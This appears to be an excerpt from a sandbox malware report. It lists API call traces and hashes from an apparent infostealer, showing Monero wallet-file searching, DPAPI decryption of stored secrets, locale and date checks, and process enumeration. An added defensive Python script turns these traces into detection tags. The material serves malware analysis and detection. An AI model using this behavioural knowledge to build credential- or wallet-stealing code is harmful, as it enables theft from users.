                        • Associated: 00000000.00000002.1778961954.00000000010BD000.00000040.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.1778961954.00000000010E2000.00000040.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.1778961954.000000000124A000.00000040.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.1779111781.00000000013E1000.00000040.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.1779111781.00000000014B8000.00000040.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.1779111781.00000000014D8000.00000040.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.1779111781.00000000014E6000.00000040.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.1779111781.00000000014F4000.00000040.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.1779344711.00000000014F5000.00000080.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.1779450895.0000000001688000.00000040.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.1779466575.0000000001689000.00000080.00000001.01000000.00000003.sdmp
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_0_2_1000000_file.jbxd
                        Yara matches
                        Similarity
                        • API ID:
                        • String ID: 5|7$Y4<$e_v$m$j=$vyi$F;[
                        • API String ID: 0-232513389
                        • Opcode ID: 05b36d45acd2777129fb67f9ab33312fe56332a1fc0598ada31ab4cf050e5bd9
                        • Instruction ID: 9b9fcfc7515ff6c5c398b9af2530fff8e763758bf57f0dd767ce19032a5f66c0
                        • Opcode Fuzzy Hash: 05b36d45acd2777129fb67f9ab33312fe56332a1fc0598ada31ab4cf050e5bd9
                        • Instruction Fuzzy Hash: B9B207F390C2049FE3046E2DEC8567AFBE9EF94320F1A492DE6C4C7744EA3598418796
                        Strings
                        Memory Dump Source
                        • Source File: 00000000.00000002.1779111781.000000000125E000.00000040.00000001.01000000.00000003.sdmp, Offset: 01000000, based on PE: true
                        • Associated: 00000000.00000002.1778948540.0000000001000000.00000004.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.1778961954.0000000001001000.00000040.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.1778961954.00000000010B1000.00000040.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.1778961954.00000000010BD000.00000040.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.1778961954.00000000010E2000.00000040.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.1778961954.000000000124A000.00000040.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.1779111781.00000000013E1000.00000040.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.1779111781.00000000014B8000.00000040.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.1779111781.00000000014D8000.00000040.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.1779111781.00000000014E6000.00000040.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.1779111781.00000000014F4000.00000040.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.1779344711.00000000014F5000.00000080.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.1779450895.0000000001688000.00000040.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.1779466575.0000000001689000.00000080.00000001.01000000.00000003.sdmp
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_0_2_1000000_file.jbxd
                        Yara matches
                        Similarity
                        • API ID:
                        • String ID: $rAJ$Y4<$_Ej>${~f^$}xm>
                        • API String ID: 0-3724111844
                        • Opcode ID: b2c382c933aacf1fa331c3ab75af581b8a83047b74e8dbdbcdc35ff08d60be28
                        • Instruction ID: 835ca37d267a806a768ee7c19ced5b040f246bc6c1d3b50566b943f50b185e26
                        • Opcode Fuzzy Hash: b2c382c933aacf1fa331c3ab75af581b8a83047b74e8dbdbcdc35ff08d60be28
                        • Instruction Fuzzy Hash: 76B239F3A0C214AFE304AE2DEC8167ABBE9EF94720F16463DE6C4C7744E63558018696
                        APIs
                        • lstrlen.KERNEL32(?,00000001,?,00000000,00000000,00000000), ref: 0100C871
                        • CryptStringToBinaryA.CRYPT32(?,00000000), ref: 0100C87C
                        • lstrcat.KERNEL32(?,01020B46), ref: 0100C943
                        • lstrcat.KERNEL32(?,01020B47), ref: 0100C957
                        • lstrcat.KERNEL32(?,01020B4E), ref: 0100C978
                        Memory Dump Source
                        • Source File: 00000000.00000002.1778961954.0000000001001000.00000040.00000001.01000000.00000003.sdmp, Offset: 01000000, based on PE: true
                        • Associated: 00000000.00000002.1778948540.0000000001000000.00000004.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.1778961954.00000000010B1000.00000040.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.1778961954.00000000010BD000.00000040.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.1778961954.00000000010E2000.00000040.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.1778961954.000000000124A000.00000040.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.1779111781.000000000125E000.00000040.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.1779111781.00000000013E1000.00000040.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.1779111781.00000000014B8000.00000040.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.1779111781.00000000014D8000.00000040.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.1779111781.00000000014E6000.00000040.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.1779111781.00000000014F4000.00000040.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.1779344711.00000000014F5000.00000080.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.1779450895.0000000001688000.00000040.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.1779466575.0000000001689000.00000080.00000001.01000000.00000003.sdmp
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_0_2_1000000_file.jbxd
                        Yara matches
                        Similarity
                        • API ID: lstrcat$BinaryCryptStringlstrlen
                        • String ID:
                        • API String ID: 189259977-0
                        • Opcode ID: 117bc1c5d383e42c52c33b046cad427d3998cab84b4b35cfddb3339aa6db559b
                        • Instruction ID: 7de99eed6d20543e5bde48993dfa249e197eee808e7ba8c5ccba80d10b610b58
                        • Opcode Fuzzy Hash: 117bc1c5d383e42c52c33b046cad427d3998cab84b4b35cfddb3339aa6db559b
                        • Instruction Fuzzy Hash: 954142B994421ADFEB20DF94DD89BFEB7B8BB44704F0042A8F509A7284D7745A84CF91
                        APIs
                        • GetSystemTime.KERNEL32(?), ref: 0101696C
                        • sscanf.NTDLL ref: 01016999
                        • SystemTimeToFileTime.KERNEL32(?,00000000), ref: 010169B2
                        • SystemTimeToFileTime.KERNEL32(?,00000000), ref: 010169C0
                        • ExitProcess.KERNEL32 ref: 010169DA
                        Memory Dump Source
                        • Source File: 00000000.00000002.1778961954.0000000001001000.00000040.00000001.01000000.00000003.sdmp, Offset: 01000000, based on PE: true
                        • Associated: 00000000.00000002.1778948540.0000000001000000.00000004.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.1778961954.00000000010B1000.00000040.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.1778961954.00000000010BD000.00000040.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.1778961954.00000000010E2000.00000040.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.1778961954.000000000124A000.00000040.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.1779111781.000000000125E000.00000040.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.1779111781.00000000013E1000.00000040.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.1779111781.00000000014B8000.00000040.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.1779111781.00000000014D8000.00000040.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.1779111781.00000000014E6000.00000040.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.1779111781.00000000014F4000.00000040.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.1779344711.00000000014F5000.00000080.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.1779450895.0000000001688000.00000040.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.1779466575.0000000001689000.00000080.00000001.01000000.00000003.sdmp
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_0_2_1000000_file.jbxd
                        Yara matches
                        Similarity
                        • API ID: Time$System$File$ExitProcesssscanf
                        • String ID:
                        • API String ID: 2533653975-0
                        • Opcode ID: 16e5dddb07eb53fdc40121228fb036d89dd6a64c8e671a1db9688968927932b1
                        • Instruction ID: 6ab07bcfdc5d88c5d5798f8d93dc657ce0c8445f96bf51b0feea3ace099d30f1
                        • Opcode Fuzzy Hash: 16e5dddb07eb53fdc40121228fb036d89dd6a64c8e671a1db9688968927932b1
                        • Instruction Fuzzy Hash: AE21FCB5D04209ABDF14EFE4E9499EEB7B9FF48300F04852EE506E3244EB355605CB65
                        APIs
                        • GetProcessHeap.KERNEL32(00000008,00000400), ref: 0100724D
                        • RtlAllocateHeap.NTDLL(00000000), ref: 01007254
                        • CryptUnprotectData.CRYPT32(?,00000000,00000000,00000000,00000000,00000001,?), ref: 01007281
                        • WideCharToMultiByte.KERNEL32(00000000,00000000,?,?,?,00000400,00000000,00000000), ref: 010072A4
                        • LocalFree.KERNEL32(?), ref: 010072AE
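                        The API chains listed in this and the preceding entries (FindFirstFileA/FindNextFileA with the \Monero\wallet.keys string in a subcall, GetKeyboardLayoutList followed by GetLocaleInfoA, CryptStringToBinaryA, GetSystemTime/sscanf/SystemTimeToFileTime/ExitProcess, and CryptUnprotectData followed by WideCharToMultiByte) are the behavioural evidence behind the report's signatures. The Python below is an added example, not Joe Sandbox code and not code recovered from the sample: it parses API lines copied from the entries above into per-function traces, maps each trace to a behaviour tag, and decodes the argument values that matter to an analyst (the dwFlags and entropy arguments of CryptUnprotectData, the LCType of GetLocaleInfoA). The chain table is the editor's own heuristic, and reading the date chain as a build-expiry check is an inference from the trace, not something the report states.

```python
"""Turn Joe Sandbox per-function API traces into behaviour tags.

Added example for this report; not Joe Sandbox code and not code from the
sample. The chain table and argument decoding are the editor's heuristics
(assumption: a chain matches when every API it lists appears in one
function's own trace, subcall lines excluded).
"""
import re
from dataclasses import dataclass
from typing import Optional

# One "• Api.MODULE(args), ref: ADDR" line, optionally prefixed with
# "Part of subcall function ADDR:". sscanf/ExitProcess lines have no "(args)".
API_LINE = re.compile(
    r"^\s*•\s*(?:Part of subcall function (?P<sub>[0-9A-F]{8}):\s*)?"
    r"(?P<api>\w+)\.(?P<mod>[A-Z0-9]+)"
    r"(?:\((?P<args>[^)]*)\))?\s*,?\s*ref:\s*(?P<ref>[0-9A-F]{8})\s*$"
)

# Required own-function APIs per behaviour; dict order is output order.
CHAINS = {
    "directory enumeration (wallet-file hunting)": {"FindFirstFileA", "FindNextFileA"},
    "locale check via keyboard layouts": {"GetKeyboardLayoutList", "GetLocaleInfoA"},
    "base64 decode of embedded data": {"CryptStringToBinaryA"},
    "date parse, compare and exit (build-expiry check, inferred)":
        {"GetSystemTime", "sscanf", "SystemTimeToFileTime", "ExitProcess"},
    "DPAPI decryption of stored secrets": {"CryptUnprotectData"},
}

@dataclass
class Call:
    api: str
    module: str
    args: tuple
    ref: str
    subcall: Optional[str] = None  # callee address for "Part of subcall" lines

def parse_trace(text: str) -> list:
    """Split a report fragment into per-function traces, one per 'APIs' header."""
    traces = []
    for line in text.splitlines():
        if line.strip() == "APIs":
            traces.append([])
            continue
        m = API_LINE.match(line)
        if m and traces:
            args = tuple(a for a in (m["args"] or "").split(",") if a)
            traces[-1].append(Call(m["api"], m["mod"], args, m["ref"], m["sub"]))
    return traces

def classify(trace: list) -> dict:
    """Map one function's trace to behaviour tags plus argument-level evidence."""
    own = {c.api for c in trace if c.subcall is None}
    tags = [name for name, need in CHAINS.items() if need <= own]
    evidence = []
    for c in trace:
        if c.api == "CryptUnprotectData" and len(c.args) == 7:
            # (pDataIn, ppszDescr, pOptionalEntropy, pvReserved, pPromptStruct, dwFlags, pDataOut)
            flags = int(c.args[5], 16)
            note = f"CryptUnprotectData dwFlags=0x{flags:X}"
            if flags & 0x1:
                note += " CRYPTPROTECT_UI_FORBIDDEN"
            if c.args[2] == "00000000":
                note += ", no optional entropy"
            evidence.append(note)
        elif c.api == "GetLocaleInfoA" and len(c.args) >= 2 and c.args[1] == "00000002":
            evidence.append("GetLocaleInfoA LCType=0x2 (LOCALE_SLANGUAGE)")
        for a in c.args:
            if "wallet" in a.lower():
                evidence.append(f"path fragment {a} passed via subcall {c.subcall}")
    return {"tags": tags, "evidence": evidence,
            "refs": [c.ref for c in trace if c.subcall is None]}

# Lines copied from the report entries above (trimmed to the calls that matter).
REPORT = r"""APIs
  • Part of subcall function 0101A9B0: lstrlen.KERNEL32(?,01899068,?,\Monero\wallet.keys,01020E17), ref: 0101A9C5
• FindFirstFileA.KERNEL32(00000000,?,00000000,?,\*.*,01020C2E), ref: 0100DE5E
• StrCmpCA.SHLWAPI(?,010214C8), ref: 0100DEAE
• FindNextFileA.KERNEL32(000000FF,?), ref: 0100E3E0
• FindClose.KERNEL32(000000FF), ref: 0100E3F2
APIs
• GetKeyboardLayoutList.USER32(00000000,00000000,010205AF), ref: 01017BE1
• LocalAlloc.KERNEL32(00000040,?), ref: 01017BF9
• GetLocaleInfoA.KERNEL32(?,00000002,?,00000200), ref: 01017C62
• LocalFree.KERNEL32(00000000), ref: 01017D22
APIs
• lstrlen.KERNEL32(?,00000001,?,00000000,00000000,00000000), ref: 0100C871
• CryptStringToBinaryA.CRYPT32(?,00000000), ref: 0100C87C
• lstrcat.KERNEL32(?,01020B46), ref: 0100C943
APIs
• GetSystemTime.KERNEL32(?), ref: 0101696C
• sscanf.NTDLL ref: 01016999
• SystemTimeToFileTime.KERNEL32(?,00000000), ref: 010169B2
• ExitProcess.KERNEL32 ref: 010169DA
APIs
• GetProcessHeap.KERNEL32(00000008,00000400), ref: 0100724D
• CryptUnprotectData.CRYPT32(?,00000000,00000000,00000000,00000000,00000001,?), ref: 01007281
• WideCharToMultiByte.KERNEL32(00000000,00000000,?,?,?,00000400,00000000,00000000), ref: 010072A4
"""

def summarize(text: str) -> list:
    """Behaviour tags and evidence for every function in a report fragment."""
    return [classify(t) for t in parse_trace(text)]

if __name__ == "__main__":
    for i, r in enumerate(summarize(REPORT)):
        print(f"function {i} ({', '.join(r['refs'][:2])}...): {r['tags']}")
        for e in r["evidence"]:
            print("    ", e)
```

                        Subcall lines are kept for their string arguments but excluded from chain matching, since they belong to a helper rather than to the function under analysis. The argument decoding is what turns a generic "calls CryptUnprotectData" into something actionable: a NULL pOptionalEntropy with CRYPTPROTECT_UI_FORBIDDEN is the shape of a browser-credential decrypt that needs no user interaction, which is what a detection rule on DPAPI usage should key on.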
                        Memory Dump Source
                        • Source File: 00000000.00000002.1778961954.0000000001001000.00000040.00000001.01000000.00000003.sdmp, Offset: 01000000, based on PE: true
                        • Associated: 00000000.00000002.1778948540.0000000001000000.00000004.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.1778961954.00000000010B1000.00000040.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.1778961954.00000000010BD000.00000040.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.1778961954.00000000010E2000.00000040.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.1778961954.000000000124A000.00000040.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.1779111781.000000000125E000.00000040.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.1779111781.00000000013E1000.00000040.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.1779111781.00000000014B8000.00000040.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.1779111781.00000000014D8000.00000040.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.1779111781.00000000014E6000.00000040.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.1779111781.00000000014F4000.00000040.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.1779344711.00000000014F5000.00000080.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.1779450895.0000000001688000.00000040.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.1779466575.0000000001689000.00000080.00000001.01000000.00000003.sdmp
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_0_2_1000000_file.jbxd
                        Yara matches
                        Similarity
                        • API ID: Heap$AllocateByteCharCryptDataFreeLocalMultiProcessUnprotectWide
                        • String ID:
                        • API String ID: 2609814428-0
                        • Opcode ID: 183f511dba7a2a71f3d2cda89d2d63bdedda979e3ff1fd6e98af41d9d282f1a9
                        • Instruction ID: 19420cdd6cc34d1034f424b6731372435a089a1d07a68781bd94eae1f6b459a1
                        • Opcode Fuzzy Hash: 183f511dba7a2a71f3d2cda89d2d63bdedda979e3ff1fd6e98af41d9d282f1a9
                        • Instruction Fuzzy Hash: E30100B5A80208BBEB24DF94DD4AF9D77B8EB44704F104145FB06AB2C4D670AA008B65
                        APIs
                        • CreateToolhelp32Snapshot.KERNEL32(00000002,00000000), ref: 0101961E
                        • Process32First.KERNEL32(01020ACA,00000128), ref: 01019632
                        • Process32Next.KERNEL32(01020ACA,00000128), ref: 01019647
                        • StrCmpCA.SHLWAPI(?,00000000), ref: 0101965C
                        • CloseHandle.KERNEL32(01020ACA), ref: 0101967A
                        Memory Dump Source
                        • Source File: 00000000.00000002.1778961954.0000000001001000.00000040.00000001.01000000.00000003.sdmp, Offset: 01000000, based on PE: true
                        • Associated: 00000000.00000002.1778948540.0000000001000000.00000004.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.1778961954.00000000010B1000.00000040.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.1778961954.00000000010BD000.00000040.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.1778961954.00000000010E2000.00000040.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.1778961954.000000000124A000.00000040.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.1779111781.000000000125E000.00000040.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.1779111781.00000000013E1000.00000040.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.1779111781.00000000014B8000.00000040.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.1779111781.00000000014D8000.00000040.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.1779111781.00000000014E6000.00000040.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.1779111781.00000000014F4000.00000040.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.1779344711.00000000014F5000.00000080.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.1779450895.0000000001688000.00000040.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.1779466575.0000000001689000.00000080.00000001.01000000.00000003.sdmp
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_0_2_1000000_file.jbxd
                        Yara matches
                        Similarity
                        • API ID: Process32$CloseCreateFirstHandleNextSnapshotToolhelp32
                        • String ID:
                        • API String ID: 420147892-0
                        • Opcode ID: 8c21bda65b2136d3f331d1dd2d9d9bdcbf700704a0b33a296442b135e26ff8d6
                        • Instruction ID: 8f5b985f625afb2adf8130423f9ccc412bcd7cbc3a0f870f4b97fb0306b12783
                        • Opcode Fuzzy Hash: 8c21bda65b2136d3f331d1dd2d9d9bdcbf700704a0b33a296442b135e26ff8d6
                        • Instruction Fuzzy Hash: 35011EB9A40208EBDB24DFA5D958BEDBBF8FB4C704F004588A94A97244D7389B40CF60
                        Strings
                        Memory Dump Source
                        • Source File: 00000000.00000002.1779111781.000000000125E000.00000040.00000001.01000000.00000003.sdmp, Offset: 01000000, based on PE: true
                        • Associated: 00000000.00000002.1778948540.0000000001000000.00000004.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.1778961954.0000000001001000.00000040.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.1778961954.00000000010B1000.00000040.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.1778961954.00000000010BD000.00000040.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.1778961954.00000000010E2000.00000040.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.1778961954.000000000124A000.00000040.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.1779111781.00000000013E1000.00000040.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.1779111781.00000000014B8000.00000040.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.1779111781.00000000014D8000.00000040.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.1779111781.00000000014E6000.00000040.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.1779111781.00000000014F4000.00000040.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.1779344711.00000000014F5000.00000080.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.1779450895.0000000001688000.00000040.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.1779466575.0000000001689000.00000080.00000001.01000000.00000003.sdmp
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_0_2_1000000_file.jbxd
                        Yara matches
                        Similarity
                        • API ID:
                        • String ID: 0=_$6>du$q{~~$v7w
                        • API String ID: 0-3316258773
                        • Opcode ID: 14a725372e07dcc3ec17ce8bc693d60ee4cf05b1006e1db6d46b022e0144fa4c
                        • Instruction ID: 679a5187a3e38aee47f968ca41207f4221da60e7f823355a45dd423e259d869d
                        • Opcode Fuzzy Hash: 14a725372e07dcc3ec17ce8bc693d60ee4cf05b1006e1db6d46b022e0144fa4c
                        • Instruction Fuzzy Hash: E6B204F360C2049FE3046E2DEC8567AFBE5EF94720F1A463DEAC5D3744EA3598048696
                        Strings
                        Memory Dump Source
                        • Source File: 00000000.00000002.1779111781.000000000125E000.00000040.00000001.01000000.00000003.sdmp, Offset: 01000000, based on PE: true
                        • Associated: 00000000.00000002.1778948540.0000000001000000.00000004.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.1778961954.0000000001001000.00000040.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.1778961954.00000000010B1000.00000040.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.1778961954.00000000010BD000.00000040.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.1778961954.00000000010E2000.00000040.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.1778961954.000000000124A000.00000040.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.1779111781.00000000013E1000.00000040.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.1779111781.00000000014B8000.00000040.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.1779111781.00000000014D8000.00000040.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.1779111781.00000000014E6000.00000040.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.1779111781.00000000014F4000.00000040.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.1779344711.00000000014F5000.00000080.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.1779450895.0000000001688000.00000040.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.1779466575.0000000001689000.00000080.00000001.01000000.00000003.sdmp
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_0_2_1000000_file.jbxd
                        Yara matches
                        Similarity
                        • API ID:
                        • String ID: /N_$aB:i$hWz$w&Lm
                        • API String ID: 0-247770825
                        • Opcode ID: f15cbb399831aead8218fb3fa51ce0c258f56121323583b710b0c85b306a6207
                        • Instruction ID: 07631b8fca7094ddce6680c0f524d99dd099ad5d839847de64a026f3a7ecbbb2
                        • Opcode Fuzzy Hash: f15cbb399831aead8218fb3fa51ce0c258f56121323583b710b0c85b306a6207
                        • Instruction Fuzzy Hash: 5EB2F6F390C2009FE304AE2DEC8567ABBE5EF94720F1A493DEAC487744E63598458797
                        APIs
                        • CryptBinaryToStringA.CRYPT32(00000000,01005184,40000001,00000000,00000000,?,01005184), ref: 01018EC0
                        Memory Dump Source
                        • Source File: 00000000.00000002.1778961954.0000000001001000.00000040.00000001.01000000.00000003.sdmp, Offset: 01000000, based on PE: true
                        • Associated: 00000000.00000002.1778948540.0000000001000000.00000004.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.1778961954.00000000010B1000.00000040.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.1778961954.00000000010BD000.00000040.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.1778961954.00000000010E2000.00000040.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.1778961954.000000000124A000.00000040.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.1779111781.000000000125E000.00000040.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.1779111781.00000000013E1000.00000040.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.1779111781.00000000014B8000.00000040.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.1779111781.00000000014D8000.00000040.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.1779111781.00000000014E6000.00000040.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.1779111781.00000000014F4000.00000040.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.1779344711.00000000014F5000.00000080.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.1779450895.0000000001688000.00000040.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.1779466575.0000000001689000.00000080.00000001.01000000.00000003.sdmp
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_0_2_1000000_file.jbxd
                        Yara matches
                        Similarity
                        • API ID: BinaryCryptString
                        • String ID:
                        • API String ID: 80407269-0
                        • Opcode ID: 36257a25567d1f3d346bec43600df8d4c92b3bd57971f4d2a10e00f00022925e
                        • Instruction ID: b127c1c78a8af653689aab15e276dcb4e0f71b235bd6f22fbb490deddffbefcb
                        • Opcode Fuzzy Hash: 36257a25567d1f3d346bec43600df8d4c92b3bd57971f4d2a10e00f00022925e
                        • Instruction Fuzzy Hash: 37111F74200205BFDB40CFA4E888FAB33EAAF89304F00D449FA598B245D739E941CB60
                        APIs
                        • CryptStringToBinaryA.CRYPT32(?,00000000,00000001,00000000,01004EEE,00000000,00000000), ref: 01009AEF
                        • LocalAlloc.KERNEL32(00000040,?,?,?,01004EEE,00000000,?), ref: 01009B01
                        • CryptStringToBinaryA.CRYPT32(?,00000000,00000001,00000000,01004EEE,00000000,00000000), ref: 01009B2A
                        • LocalFree.KERNEL32(?,?,?,?,01004EEE,00000000,?), ref: 01009B3F
                        Memory Dump Source
                        • Source File: 00000000.00000002.1778961954.0000000001001000.00000040.00000001.01000000.00000003.sdmp, Offset: 01000000, based on PE: true
                        • Associated: 00000000.00000002.1778948540.0000000001000000.00000004.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.1778961954.00000000010B1000.00000040.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.1778961954.00000000010BD000.00000040.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.1778961954.00000000010E2000.00000040.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.1778961954.000000000124A000.00000040.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.1779111781.000000000125E000.00000040.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.1779111781.00000000013E1000.00000040.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.1779111781.00000000014B8000.00000040.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.1779111781.00000000014D8000.00000040.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.1779111781.00000000014E6000.00000040.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.1779111781.00000000014F4000.00000040.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.1779344711.00000000014F5000.00000080.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.1779450895.0000000001688000.00000040.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.1779466575.0000000001689000.00000080.00000001.01000000.00000003.sdmp
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_0_2_1000000_file.jbxd
                        Yara matches
                        Similarity
                        • API ID: BinaryCryptLocalString$AllocFree
                        • String ID:
                        • API String ID: 4291131564-0
                        • Opcode ID: 82555faede864747760481a622e0d696d8c176619825d031b7d7445f88d1db72
                        • Instruction ID: 0705d5f4eed7cf83e7690fcc147bf0d089aa460deb5c04913889ba378db24217
                        • Opcode Fuzzy Hash: 82555faede864747760481a622e0d696d8c176619825d031b7d7445f88d1db72
                        • Instruction Fuzzy Hash: 7111A4B8240208AFEB11CF64D895FAA77B5FB89714F208058FA199F3C4C7B6A901CB50
                        APIs
                        • GetProcessHeap.KERNEL32(00000000,00000104,?,?,?,00000000,00000000,?,0189E2A8,00000000,?,01020E10,00000000,?,00000000,00000000), ref: 01017A63
                        • RtlAllocateHeap.NTDLL(00000000), ref: 01017A6A
                        • GetTimeZoneInformation.KERNEL32(?,?,?,?,00000000,00000000,?,0189E2A8,00000000,?,01020E10,00000000,?,00000000,00000000,?), ref: 01017A7D
